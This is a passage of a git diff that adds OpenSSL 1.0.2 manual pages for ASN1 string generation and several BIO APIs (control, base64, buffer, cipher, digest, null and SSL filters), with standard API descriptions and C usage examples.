+Encodes an ASN1 B<OCTET STRING>. B<value> represents the contents
+of this structure, the format strings B<ASCII> and B<HEX> can be
+used to specify the format of B<value>.
+
+=item B<BITSTRING>, B<BITSTR>
+
+Encodes an ASN1 B<BIT STRING>. B<value> represents the contents
+of this structure, the format strings B<ASCII>, B<HEX> and B<BITLIST>
+can be used to specify the format of B<value>.
+
+If the format is anything other than B<BITLIST> the number of unused
+bits is set to zero.
+
+=item B<UNIVERSALSTRING>, B<UNIV>, B<IA5>, B<IA5STRING>, B<UTF8>,
+B<UTF8String>, B<BMP>, B<BMPSTRING>, B<VISIBLESTRING>,
+B<VISIBLE>, B<PRINTABLESTRING>, B<PRINTABLE>, B<T61>,
+B<T61STRING>, B<TELETEXSTRING>, B<GeneralString>, B<NUMERICSTRING>,
+B<NUMERIC>
+
+These encode the corresponding string types. B<value> represents the
+contents of this structure. The format can be B<ASCII> or B<UTF8>.
+
+=item B<SEQUENCE>, B<SEQ>, B<SET>
+
+Formats the result as an ASN1 B<SEQUENCE> or B<SET> type. B<value>
+should be a section name which will contain the contents. The
+field names in the section are ignored and the values are in the
+generated string format. If B<value> is absent then an empty SEQUENCE
+will be encoded.
+
+=back
+
+=head2 MODIFIERS
+
+Modifiers affect the following structure, they can be used to
+add EXPLICIT or IMPLICIT tagging, add wrappers or to change
+the string format of the final type and value. The supported
+formats are documented below.
+
+=over 2
+
+=item B<EXPLICIT>, B<EXP>
+
+Add an explicit tag to the following structure. This string
+should be followed by a colon and the tag value to use as a
+decimal value.
+
+By following the number with B<U>, B<A>, B<P> or B<C> UNIVERSAL,
+APPLICATION, PRIVATE or CONTEXT SPECIFIC tagging can be used,
+the default is CONTEXT SPECIFIC.
+
+=item B<IMPLICIT>, B<IMP>
+
+This is the same as B<EXPLICIT> except IMPLICIT tagging is used
+instead.
+
+=item B<OCTWRAP>, B<SEQWRAP>, B<SETWRAP>, B<BITWRAP>
+
+The following structure is surrounded by an OCTET STRING, a SEQUENCE,
+a SET or a BIT STRING respectively. For a BIT STRING the number of unused
+bits is set to zero.
+
+=item B<FORMAT>
+
+This specifies the format of the ultimate value. It should be followed
+by a colon and one of the strings B<ASCII>, B<UTF8>, B<HEX> or B<BITLIST>.
+
+If no format specifier is included then B<ASCII> is used. If B<UTF8> is
+specified then the value string must be a valid B<UTF8> string. For B<HEX> the
+output must be a set of hex digits. B<BITLIST> (which is only valid for a BIT
+STRING) is a comma separated list of the indices of the set bits, all other
+bits are zero.
+
+=back
+
+=head1 EXAMPLES
+
+A simple IA5String:
+
+ IA5STRING:Hello World
+
+An IA5String explicitly tagged:
+
+ EXPLICIT:0,IA5STRING:Hello World
+
+An IA5String explicitly tagged using APPLICATION tagging:
+
+ EXPLICIT:0A,IA5STRING:Hello World
+
+A BITSTRING with bits 1 and 5 set and all others zero:
+
+ FORMAT:BITLIST,BITSTRING:1,5
+
+A more complex example using a config file to produce a
+SEQUENCE consiting of a BOOL an OID and a UTF8String:
+
+ asn1 = SEQUENCE:seq_section
+
+ [seq_section]
+
+ field1 = BOOLEAN:TRUE
+ field2 = OID:commonName
+ field3 = UTF8:Third field
+
+This example produces an RSAPrivateKey structure, this is the
+key contained in the file client.pem in all OpenSSL distributions
+(note: the field names such as 'coeff' are ignored and are present just
+for clarity):
+
+ asn1=SEQUENCE:private_key
+ [private_key]
+ version=INTEGER:0
+
+ n=INTEGER:0xBB6FE79432CC6EA2D8F970675A5A87BFBE1AFF0BE63E879F2AFFB93644\
+ D4D2C6D000430DEC66ABF47829E74B8C5108623A1C0EE8BE217B3AD8D36D5EB4FCA1D9
+
+ e=INTEGER:0x010001
+
+ d=INTEGER:0x6F05EAD2F27FFAEC84BEC360C4B928FD5F3A9865D0FCAAD291E2A52F4A\
+ F810DC6373278C006A0ABBA27DC8C63BF97F7E666E27C5284D7D3B1FFFE16B7A87B51D
+
+ p=INTEGER:0xF3929B9435608F8A22C208D86795271D54EBDFB09DDEF539AB083DA912\
+ D4BD57
+
+ q=INTEGER:0xC50016F89DFF2561347ED1186A46E150E28BF2D0F539A1594BBD7FE467\
+ 46EC4F
+
+ exp1=INTEGER:0x9E7D4326C924AFC1DEA40B45650134966D6F9DFA3A7F9D698CD4ABEA\
+ 9C0A39B9
+
+ exp2=INTEGER:0xBA84003BB95355AFB7C50DF140C60513D0BA51D637272E355E397779\
+ E7B2458F
+
+ coeff=INTEGER:0x30B9E4F2AFA5AC679F920FC83F1F2DF1BAF1779CF989447FABC2F5\
+ 628657053A
+
+This example is the corresponding public key in a SubjectPublicKeyInfo
+structure:
+
+ # Start with a SEQUENCE
+ asn1=SEQUENCE:pubkeyinfo
+
+ # pubkeyinfo contains an algorithm identifier and the public key wrapped
+ # in a BIT STRING
+ [pubkeyinfo]
+ algorithm=SEQUENCE:rsa_alg
+ pubkey=BITWRAP,SEQUENCE:rsapubkey
+
+ # algorithm ID for RSA is just an OID and a NULL
+ [rsa_alg]
+ algorithm=OID:rsaEncryption
+ parameter=NULL
+
+ # Actual public key: modulus and exponent
+ [rsapubkey]
+ n=INTEGER:0xBB6FE79432CC6EA2D8F970675A5A87BFBE1AFF0BE63E879F2AFFB93644\
+ D4D2C6D000430DEC66ABF47829E74B8C5108623A1C0EE8BE217B3AD8D36D5EB4FCA1D9
+
+ e=INTEGER:0x010001
+
+=head1 RETURN VALUES
+
+ASN1_generate_nconf() and ASN1_generate_v3() return the encoded
+data as an B<ASN1_TYPE> structure or B<NULL> if an error occurred.
+
+The error codes that can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>
+
+=head1 HISTORY
+
+ASN1_generate_nconf() and ASN1_generate_v3() were added to OpenSSL 0.9.8
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_ctrl.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_ctrl.pod
new file mode 100644
index 0000000..722e8b8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_ctrl.pod
@@ -0,0 +1,128 @@
+=pod
+
+=head1 NAME
+
+BIO_ctrl, BIO_callback_ctrl, BIO_ptr_ctrl, BIO_int_ctrl, BIO_reset,
+BIO_seek, BIO_tell, BIO_flush, BIO_eof, BIO_set_close, BIO_get_close,
+BIO_pending, BIO_wpending, BIO_ctrl_pending, BIO_ctrl_wpending,
+BIO_get_info_callback, BIO_set_info_callback - BIO control operations
+
+=head1 SYNOPSIS
+
+ #include <openssl/bio.h>
+
+ long BIO_ctrl(BIO *bp,int cmd,long larg,void *parg);
+ long BIO_callback_ctrl(BIO *b, int cmd, void (*fp)(struct bio_st *, int, const char *, int, long, long));
+ char *	BIO_ptr_ctrl(BIO *bp,int cmd,long larg);
+ long BIO_int_ctrl(BIO *bp,int cmd,long larg,int iarg);
+
+ int BIO_reset(BIO *b);
+ int BIO_seek(BIO *b, int ofs);
+ int BIO_tell(BIO *b);
+ int BIO_flush(BIO *b);
+ int BIO_eof(BIO *b);
+ int BIO_set_close(BIO *b,long flag);
+ int BIO_get_close(BIO *b);
+ int BIO_pending(BIO *b);
+ int BIO_wpending(BIO *b);
+ size_t BIO_ctrl_pending(BIO *b);
+ size_t BIO_ctrl_wpending(BIO *b);
+
+ int BIO_get_info_callback(BIO *b,bio_info_cb **cbp);
+ int BIO_set_info_callback(BIO *b,bio_info_cb *cb);
+
+ typedef void bio_info_cb(BIO *b, int oper, const char *ptr, int arg1, long arg2, long arg3);
+
+=head1 DESCRIPTION
+
+BIO_ctrl(), BIO_callback_ctrl(), BIO_ptr_ctrl() and BIO_int_ctrl()
+are BIO "control" operations taking arguments of various types.
+These functions are not normally called directly, various macros
+are used instead. The standard macros are described below, macros
+specific to a particular type of BIO are described in the specific
+BIOs manual page as well as any special features of the standard
+calls.
+
+BIO_reset() typically resets a BIO to some initial state, in the case
+of file related BIOs for example it rewinds the file pointer to the
+start of the file.
+
+BIO_seek() resets a file related BIO's (that is file descriptor and
+FILE BIOs) file position pointer to B<ofs> bytes from start of file.
+
+BIO_tell() returns the current file position of a file related BIO.
+
+BIO_flush() normally writes out any internally buffered data, in some
+cases it is used to signal EOF and that no more data will be written.
+
+BIO_eof() returns 1 if the BIO has read EOF, the precise meaning of
+"EOF" varies according to the BIO type.
+
+BIO_set_close() sets the BIO B<b> close flag to B<flag>. B<flag> can
+take the value BIO_CLOSE or BIO_NOCLOSE. Typically BIO_CLOSE is used
+in a source/sink BIO to indicate that the underlying I/O stream should
+be closed when the BIO is freed.
+
+BIO_get_close() returns the BIOs close flag.
+
+BIO_pending(), BIO_ctrl_pending(), BIO_wpending() and BIO_ctrl_wpending()
+return the number of pending characters in the BIOs read and write buffers.
+Not all BIOs support these calls. BIO_ctrl_pending() and BIO_ctrl_wpending()
+return a size_t type and are functions, BIO_pending() and BIO_wpending() are
+macros which call BIO_ctrl().
+
+=head1 RETURN VALUES
+
+BIO_reset() normally returns 1 for success and 0 or -1 for failure. File
+BIOs are an exception, they return 0 for success and -1 for failure.
+
+BIO_seek() and BIO_tell() both return the current file position on success
+and -1 for failure, except file BIOs which for BIO_seek() always return 0
+for success and -1 for failure.
+
+BIO_flush() returns 1 for success and 0 or -1 for failure.
+
+BIO_eof() returns 1 if EOF has been reached 0 otherwise.
+
+BIO_set_close() always returns 1.
+
+BIO_get_close() returns the close flag value: BIO_CLOSE or BIO_NOCLOSE.
+
+BIO_pending(), BIO_ctrl_pending(), BIO_wpending() and BIO_ctrl_wpending()
+return the amount of pending data.
+
+=head1 NOTES
+
+BIO_flush(), because it can write data may return 0 or -1 indicating
+that the call should be retried later in a similar manner to BIO_write(). 
+The BIO_should_retry() call should be used and appropriate action taken
+is the call fails.
+
+The return values of BIO_pending() and BIO_wpending() may not reliably
+determine the amount of pending data in all cases. For example in the
+case of a file BIO some data may be available in the FILE structures
+internal buffers but it is not possible to determine this in a
+portably way. For other types of BIO they may not be supported.
+
+Filter BIOs if they do not internally handle a particular BIO_ctrl()
+operation usually pass the operation to the next BIO in the chain.
+This often means there is no need to locate the required BIO for
+a particular operation, it can be called on a chain and it will
+be automatically passed to the relevant BIO. However this can cause
+unexpected results: for example no current filter BIOs implement
+BIO_seek(), but this may still succeed if the chain ends in a FILE
+or file descriptor BIO.
+
+Source/sink BIOs return an 0 if they do not recognize the BIO_ctrl()
+operation.
+
+=head1 BUGS
+
+Some of the return values are ambiguous and care should be taken. In
+particular a return value of 0 can be returned if an operation is not
+supported, if an error occurred, if EOF has not been reached and in
+the case of BIO_seek() on a file BIO for a successful operation. 
+
+=head1 SEE ALSO
+
+TBA
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_f_base64.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_f_base64.pod
new file mode 100644
index 0000000..d1d7bf0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_f_base64.pod
@@ -0,0 +1,82 @@
+=pod
+
+=head1 NAME
+
+BIO_f_base64 - base64 BIO filter
+
+=head1 SYNOPSIS
+
+ #include <openssl/bio.h>
+ #include <openssl/evp.h>
+
+ BIO_METHOD *	BIO_f_base64(void);
+
+=head1 DESCRIPTION
+
+BIO_f_base64() returns the base64 BIO method. This is a filter
+BIO that base64 encodes any data written through it and decodes
+any data read through it.
+
+Base64 BIOs do not support BIO_gets() or BIO_puts(). 
+
+BIO_flush() on a base64 BIO that is being written through is
+used to signal that no more data is to be encoded: this is used
+to flush the final block through the BIO.
+
+The flag BIO_FLAGS_BASE64_NO_NL can be set with BIO_set_flags()
+to encode the data all on one line or expect the data to be all
+on one line.
+
+=head1 NOTES
+
+Because of the format of base64 encoding the end of the encoded
+block cannot always be reliably determined.
+
+=head1 RETURN VALUES
+
+BIO_f_base64() returns the base64 BIO method.
+
+=head1 EXAMPLES
+
+Base64 encode the string "Hello World\n" and write the result
+to standard output:
+
+ BIO *bio, *b64;
+ char message[] = "Hello World \n";
+
+ b64 = BIO_new(BIO_f_base64());
+ bio = BIO_new_fp(stdout, BIO_NOCLOSE);
+ BIO_push(b64, bio);
+ BIO_write(b64, message, strlen(message));
+ BIO_flush(b64);
+
+ BIO_free_all(b64);
+
+Read Base64 encoded data from standard input and write the decoded
+data to standard output:
+
+ BIO *bio, *b64, *bio_out;
+ char inbuf[512];
+ int inlen;
+
+ b64 = BIO_new(BIO_f_base64());
+ bio = BIO_new_fp(stdin, BIO_NOCLOSE);
+ bio_out = BIO_new_fp(stdout, BIO_NOCLOSE);
+ BIO_push(b64, bio);
+ while((inlen = BIO_read(b64, inbuf, 512)) > 0) 
+	BIO_write(bio_out, inbuf, inlen);
+
+ BIO_flush(bio_out);
+ BIO_free_all(b64);
+
+=head1 BUGS
+
+The ambiguity of EOF in base64 encoded data can cause additional
+data following the base64 encoded block to be misinterpreted.
+
+There should be some way of specifying a test that the BIO can perform
+to reliably determine EOF (for example a MIME boundary).
+
+=head1 SEE ALSO
+
+TBA
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_f_buffer.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_f_buffer.pod
new file mode 100644
index 0000000..c0dccf1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_f_buffer.pod
@@ -0,0 +1,74 @@
+=pod
+
+=head1 NAME
+
+BIO_f_buffer - buffering BIO
+
+=head1 SYNOPSIS
+
+ #include <openssl/bio.h>
+
+ BIO_METHOD * BIO_f_buffer(void);
+
+ #define BIO_get_buffer_num_lines(b)	BIO_ctrl(b,BIO_C_GET_BUFF_NUM_LINES,0,NULL)
+ #define BIO_set_read_buffer_size(b,size) BIO_int_ctrl(b,BIO_C_SET_BUFF_SIZE,size,0)
+ #define BIO_set_write_buffer_size(b,size) BIO_int_ctrl(b,BIO_C_SET_BUFF_SIZE,size,1)
+ #define BIO_set_buffer_size(b,size)	BIO_ctrl(b,BIO_C_SET_BUFF_SIZE,size,NULL)
+ #define BIO_set_buffer_read_data(b,buf,num) BIO_ctrl(b,BIO_C_SET_BUFF_READ_DATA,num,buf)
+
+=head1 DESCRIPTION
+
+BIO_f_buffer() returns the buffering BIO method.
+
+Data written to a buffering BIO is buffered and periodically written
+to the next BIO in the chain. Data read from a buffering BIO comes from
+an internal buffer which is filled from the next BIO in the chain.
+Both BIO_gets() and BIO_puts() are supported.
+
+Calling BIO_reset() on a buffering BIO clears any buffered data.
+
+BIO_get_buffer_num_lines() returns the number of lines currently buffered.
+
+BIO_set_read_buffer_size(), BIO_set_write_buffer_size() and BIO_set_buffer_size()
+set the read, write or both read and write buffer sizes to B<size>. The initial
+buffer size is DEFAULT_BUFFER_SIZE, currently 4096. Any attempt to reduce the
+buffer size below DEFAULT_BUFFER_SIZE is ignored. Any buffered data is cleared
+when the buffer is resized.
+
+BIO_set_buffer_read_data() clears the read buffer and fills it with B<num>
+bytes of B<buf>. If B<num> is larger than the current buffer size the buffer
+is expanded.
+
+=head1 NOTES
+
+Buffering BIOs implement BIO_gets() by using BIO_read() operations on the
+next BIO in the chain. By prepending a buffering BIO to a chain it is therefore
+possible to provide BIO_gets() functionality if the following BIOs do not
+support it (for example SSL BIOs).
+
+Data is only written to the next BIO in the chain when the write buffer fills
+or when BIO_flush() is called. It is therefore important to call BIO_flush()
+whenever any pending data should be written such as when removing a buffering
+BIO using BIO_pop(). BIO_flush() may need to be retried if the ultimate
+source/sink BIO is non blocking.
+
+=head1 RETURN VALUES
+
+BIO_f_buffer() returns the buffering BIO method.
+
+BIO_get_buffer_num_lines() returns the number of lines buffered (may be 0).
+
+BIO_set_read_buffer_size(), BIO_set_write_buffer_size() and BIO_set_buffer_size()
+return 1 if the buffer was successfully resized or 0 for failure.
+
+BIO_set_buffer_read_data() returns 1 if the data was set correctly or 0 if
+there was an error.
+
+=head1 SEE ALSO
+
+L<BIO(3)|BIO(3)>,
+L<BIO_reset(3)|BIO_reset(3)>,
+L<BIO_flush(3)|BIO_flush(3)>,
+L<BIO_pop(3)|BIO_pop(3)>,
+L<BIO_ctrl(3)|BIO_ctrl(3)>,
+L<BIO_int_ctrl(3)|BIO_ctrl(3)>
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_f_cipher.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_f_cipher.pod
new file mode 100644
index 0000000..02439ce
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_f_cipher.pod
@@ -0,0 +1,76 @@
+=pod
+
+=head1 NAME
+
+BIO_f_cipher, BIO_set_cipher, BIO_get_cipher_status, BIO_get_cipher_ctx - cipher BIO filter
+
+=head1 SYNOPSIS
+
+ #include <openssl/bio.h>
+ #include <openssl/evp.h>
+
+ BIO_METHOD *	BIO_f_cipher(void);
+ void BIO_set_cipher(BIO *b,const EVP_CIPHER *cipher,
+		unsigned char *key, unsigned char *iv, int enc);
+ int BIO_get_cipher_status(BIO *b)
+ int BIO_get_cipher_ctx(BIO *b, EVP_CIPHER_CTX **pctx)
+
+=head1 DESCRIPTION
+
+BIO_f_cipher() returns the cipher BIO method. This is a filter
+BIO that encrypts any data written through it, and decrypts any data
+read from it. It is a BIO wrapper for the cipher routines
+EVP_CipherInit(), EVP_CipherUpdate() and EVP_CipherFinal().
+
+Cipher BIOs do not support BIO_gets() or BIO_puts(). 
+
+BIO_flush() on an encryption BIO that is being written through is
+used to signal that no more data is to be encrypted: this is used
+to flush and possibly pad the final block through the BIO.
+
+BIO_set_cipher() sets the cipher of BIO B<b> to B<cipher> using key B<key>
+and IV B<iv>. B<enc> should be set to 1 for encryption and zero for
+decryption.
+
+When reading from an encryption BIO the final block is automatically
+decrypted and checked when EOF is detected. BIO_get_cipher_status()
+is a BIO_ctrl() macro which can be called to determine whether the
+decryption operation was successful.
+
+BIO_get_cipher_ctx() is a BIO_ctrl() macro which retrieves the internal
+BIO cipher context. The retrieved context can be used in conjunction
+with the standard cipher routines to set it up. This is useful when
+BIO_set_cipher() is not flexible enough for the applications needs.
+
+=head1 NOTES
+
+When encrypting BIO_flush() B<must> be called to flush the final block
+through the BIO. If it is not then the final block will fail a subsequent
+decrypt.
+
+When decrypting an error on the final block is signalled by a zero
+return value from the read operation. A successful decrypt followed
+by EOF will also return zero for the final read. BIO_get_cipher_status()
+should be called to determine if the decrypt was successful.
+
+As always, if BIO_gets() or BIO_puts() support is needed then it can
+be achieved by preceding the cipher BIO with a buffering BIO.
+
+=head1 RETURN VALUES
+
+BIO_f_cipher() returns the cipher BIO method.
+
+BIO_set_cipher() does not return a value.
+
+BIO_get_cipher_status() returns 1 for a successful decrypt and 0
+for failure.
+
+BIO_get_cipher_ctx() currently always returns 1.
+
+=head1 EXAMPLES
+
+TBA
+
+=head1 SEE ALSO
+
+TBA
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_f_md.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_f_md.pod
new file mode 100644
index 0000000..2cc41f8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_f_md.pod
@@ -0,0 +1,144 @@
+=pod
+
+=head1 NAME
+
+BIO_f_md, BIO_set_md, BIO_get_md, BIO_get_md_ctx - message digest BIO filter
+
+=head1 SYNOPSIS
+
+ #include <openssl/bio.h>
+ #include <openssl/evp.h>
+
+ BIO_METHOD *	BIO_f_md(void);
+ int BIO_set_md(BIO *b,EVP_MD *md);
+ int BIO_get_md(BIO *b,EVP_MD **mdp);
+ int BIO_get_md_ctx(BIO *b,EVP_MD_CTX **mdcp);
+
+=head1 DESCRIPTION
+
+BIO_f_md() returns the message digest BIO method. This is a filter
+BIO that digests any data passed through it, it is a BIO wrapper
+for the digest routines EVP_DigestInit(), EVP_DigestUpdate()
+and EVP_DigestFinal().
+
+Any data written or read through a digest BIO using BIO_read() and
+BIO_write() is digested.
+
+BIO_gets(), if its B<size> parameter is large enough finishes the
+digest calculation and returns the digest value. BIO_puts() is
+not supported.
+
+BIO_reset() reinitialises a digest BIO.
+
+BIO_set_md() sets the message digest of BIO B<b> to B<md>: this
+must be called to initialize a digest BIO before any data is
+passed through it. It is a BIO_ctrl() macro.
+
+BIO_get_md() places the a pointer to the digest BIOs digest method
+in B<mdp>, it is a BIO_ctrl() macro.
+
+BIO_get_md_ctx() returns the digest BIOs context into B<mdcp>.
+
+=head1 NOTES
+
+The context returned by BIO_get_md_ctx() can be used in calls
+to EVP_DigestFinal() and also the signature routines EVP_SignFinal()
+and EVP_VerifyFinal().
+
+The context returned by BIO_get_md_ctx() is an internal context
+structure. Changes made to this context will affect the digest
+BIO itself and the context pointer will become invalid when the digest
+BIO is freed.
+
+After the digest has been retrieved from a digest BIO it must be
+reinitialized by calling BIO_reset(), or BIO_set_md() before any more
+data is passed through it.
+
+If an application needs to call BIO_gets() or BIO_puts() through
+a chain containing digest BIOs then this can be done by prepending
+a buffering BIO.
+
+Before OpenSSL 1.0.0 the call to BIO_get_md_ctx() would only work if the BIO
+had been initialized for example by calling BIO_set_md() ). In OpenSSL
+1.0.0 and later the context is always returned and the BIO is state is set
+to initialized. This allows applications to initialize the context externally
+if the standard calls such as BIO_set_md() are not sufficiently flexible.
+
+=head1 RETURN VALUES
+
+BIO_f_md() returns the digest BIO method.
+
+BIO_set_md(), BIO_get_md() and BIO_md_ctx() return 1 for success and
+0 for failure.
+
+=head1 EXAMPLES
+
+The following example creates a BIO chain containing an SHA1 and MD5
+digest BIO and passes the string "Hello World" through it. Error
+checking has been omitted for clarity.
+
+ BIO *bio, *mdtmp;
+ char message[] = "Hello World";
+ bio = BIO_new(BIO_s_null());
+ mdtmp = BIO_new(BIO_f_md());
+ BIO_set_md(mdtmp, EVP_sha1());
+ /* For BIO_push() we want to append the sink BIO and keep a note of
+  * the start of the chain.
+  */
+ bio = BIO_push(mdtmp, bio);
+ mdtmp = BIO_new(BIO_f_md());
+ BIO_set_md(mdtmp, EVP_md5());
+ bio = BIO_push(mdtmp, bio);
+ /* Note: mdtmp can now be discarded */
+ BIO_write(bio, message, strlen(message));
+
+The next example digests data by reading through a chain instead:
+
+ BIO *bio, *mdtmp;
+ char buf[1024];
+ int rdlen;
+ bio = BIO_new_file(file, "rb");
+ mdtmp = BIO_new(BIO_f_md());
+ BIO_set_md(mdtmp, EVP_sha1());
+ bio = BIO_push(mdtmp, bio);
+ mdtmp = BIO_new(BIO_f_md());
+ BIO_set_md(mdtmp, EVP_md5());
+ bio = BIO_push(mdtmp, bio);
+ do {
+ 	rdlen = BIO_read(bio, buf, sizeof(buf));
+        /* Might want to do something with the data here */
+ } while(rdlen > 0);
+
+This next example retrieves the message digests from a BIO chain and
+outputs them. This could be used with the examples above.
+
+ BIO *mdtmp;
+ unsigned char mdbuf[EVP_MAX_MD_SIZE];
+ int mdlen;
+ int i;
+ mdtmp = bio;	/* Assume bio has previously been set up */
+ do {
+	EVP_MD *md;
+ 	mdtmp = BIO_find_type(mdtmp, BIO_TYPE_MD);
+        if(!mdtmp) break;
+	BIO_get_md(mdtmp, &md);
+        printf("%s digest", OBJ_nid2sn(EVP_MD_type(md)));
+	mdlen = BIO_gets(mdtmp, mdbuf, EVP_MAX_MD_SIZE);
+	for(i = 0; i < mdlen; i++) printf(":%02X", mdbuf[i]);
+	printf("\n");
+	mdtmp = BIO_next(mdtmp);
+ } while(mdtmp);
+
+ BIO_free_all(bio);
+
+=head1 BUGS
+
+The lack of support for BIO_puts() and the non standard behaviour of
+BIO_gets() could be regarded as anomalous. It could be argued that BIO_gets()
+and BIO_puts() should be passed to the next BIO in the chain and digest
+the data passed through and that digests should be retrieved using a
+separate BIO_ctrl() call.
+
+=head1 SEE ALSO
+
+TBA
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_f_null.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_f_null.pod
new file mode 100644
index 0000000..b057c18
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_f_null.pod
@@ -0,0 +1,32 @@
+=pod
+
+=head1 NAME
+
+BIO_f_null - null filter
+
+=head1 SYNOPSIS
+
+ #include <openssl/bio.h>
+
+ BIO_METHOD *	BIO_f_null(void);
+
+=head1 DESCRIPTION
+
+BIO_f_null() returns the null filter BIO method. This is a filter BIO
+that does nothing.
+
+All requests to a null filter BIO are passed through to the next BIO in
+the chain: this means that a BIO chain containing a null filter BIO
+behaves just as though the BIO was not there.
+
+=head1 NOTES
+
+As may be apparent a null filter BIO is not particularly useful.
+
+=head1 RETURN VALUES
+
+BIO_f_null() returns the null filter BIO method.
+
+=head1 SEE ALSO
+
+TBA
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_f_ssl.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_f_ssl.pod
new file mode 100644
index 0000000..a9f23f1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/BIO_f_ssl.pod
@@ -0,0 +1,322 @@
+=pod
+
+=head1 NAME
+
+BIO_f_ssl, BIO_set_ssl, BIO_get_ssl, BIO_set_ssl_mode, BIO_set_ssl_renegotiate_bytes,
+BIO_get_num_renegotiates, BIO_set_ssl_renegotiate_timeout, BIO_new_ssl,
+BIO_new_ssl_connect, BIO_new_buffer_ssl_connect, BIO_ssl_copy_session_id,
+BIO_ssl_shutdown - SSL BIO
+
+=head1 SYNOPSIS
+
+ #include <openssl/bio.h>
+ #include <openssl/ssl.h>
+
+ BIO_METHOD *BIO_f_ssl(void);
+
+ #define BIO_set_ssl(b,ssl,c)	BIO_ctrl(b,BIO_C_SET_SSL,c,(char *)ssl)
+ #define BIO_get_ssl(b,sslp)	BIO_ctrl(b,BIO_C_GET_SSL,0,(char *)sslp)
+ #define BIO_set_ssl_mode(b,client)	BIO_ctrl(b,BIO_C_SSL_MODE,client,NULL)
+ #define BIO_set_ssl_renegotiate_bytes(b,num) \
+	BIO_ctrl(b,BIO_C_SET_SSL_RENEGOTIATE_BYTES,num,NULL);
+ #define BIO_set_ssl_renegotiate_timeout(b,seconds) \
+	BIO_ctrl(b,BIO_C_SET_SSL_RENEGOTIATE_TIMEOUT,seconds,NULL);
+ #define BIO_get_num_renegotiates(b) \
+	BIO_ctrl(b,BIO_C_SET_SSL_NUM_RENEGOTIATES,0,NULL);
+
+ BIO *BIO_new_ssl(SSL_CTX *ctx,int client);
+ BIO *BIO_new_ssl_connect(SSL_CTX *ctx);
+ BIO *BIO_new_buffer_ssl_connect(SSL_CTX *ctx);
+ int BIO_ssl_copy_session_id(BIO *to,BIO *from);
+ void BIO_ssl_shutdown(BIO *bio);
+
+ #define BIO_do_handshake(b)	BIO_ctrl(b,BIO_C_DO_STATE_MACHINE,0,NULL)
+
+=head1 DESCRIPTION
+
+BIO_f_ssl() returns the SSL BIO method. This is a filter BIO which
+is a wrapper round the OpenSSL SSL routines adding a BIO "flavour" to
+SSL I/O. 
+
+I/O performed on an SSL BIO communicates using the SSL protocol with
+the SSLs read and write BIOs. If an SSL connection is not established
+then an attempt is made to establish one on the first I/O call.
+
+If a BIO is appended to an SSL BIO using BIO_push() it is automatically
+used as the SSL BIOs read and write BIOs.
+
+Calling BIO_reset() on an SSL BIO closes down any current SSL connection
+by calling SSL_shutdown(). BIO_reset() is then sent to the next BIO in
+the chain: this will typically disconnect the underlying transport.
+The SSL BIO is then reset to the initial accept or connect state.
+
+If the close flag is set when an SSL BIO is freed then the internal
+SSL structure is also freed using SSL_free().
+
+BIO_set_ssl() sets the internal SSL pointer of BIO B<b> to B<ssl> using
+the close flag B<c>.
+
+BIO_get_ssl() retrieves the SSL pointer of BIO B<b>, it can then be
+manipulated using the standard SSL library functions.
+
+BIO_set_ssl_mode() sets the SSL BIO mode to B<client>. If B<client>
+is 1 client mode is set. If B<client> is 0 server mode is set.
+
+BIO_set_ssl_renegotiate_bytes() sets the renegotiate byte count
+to B<num>. When set after every B<num> bytes of I/O (read and write) 
+the SSL session is automatically renegotiated. B<num> must be at
+least 512 bytes.
+
+BIO_set_ssl_renegotiate_timeout() sets the renegotiate timeout to
+B<seconds>. When the renegotiate timeout elapses the session is
+automatically renegotiated.
+
+BIO_get_num_renegotiates() returns the total number of session
+renegotiations due to I/O or timeout.
+
+BIO_new_ssl() allocates an SSL BIO using SSL_CTX B<ctx> and using
+client mode if B<client> is non zero.
+
+BIO_new_ssl_connect() creates a new BIO chain consisting of an
+SSL BIO (using B<ctx>) followed by a connect BIO.
+
+BIO_new_buffer_ssl_connect() creates a new BIO chain consisting
+of a buffering BIO, an SSL BIO (using B<ctx>) and a connect
+BIO.
+
+BIO_ssl_copy_session_id() copies an SSL session id between 
+BIO chains B<from> and B<to>. It does this by locating the
+SSL BIOs in each chain and calling SSL_copy_session_id() on
+the internal SSL pointer.
+
+BIO_ssl_shutdown() closes down an SSL connection on BIO
+chain B<bio>. It does this by locating the SSL BIO in the
+chain and calling SSL_shutdown() on its internal SSL
+pointer.
+
+BIO_do_handshake() attempts to complete an SSL handshake on the
+supplied BIO and establish the SSL connection. It returns 1
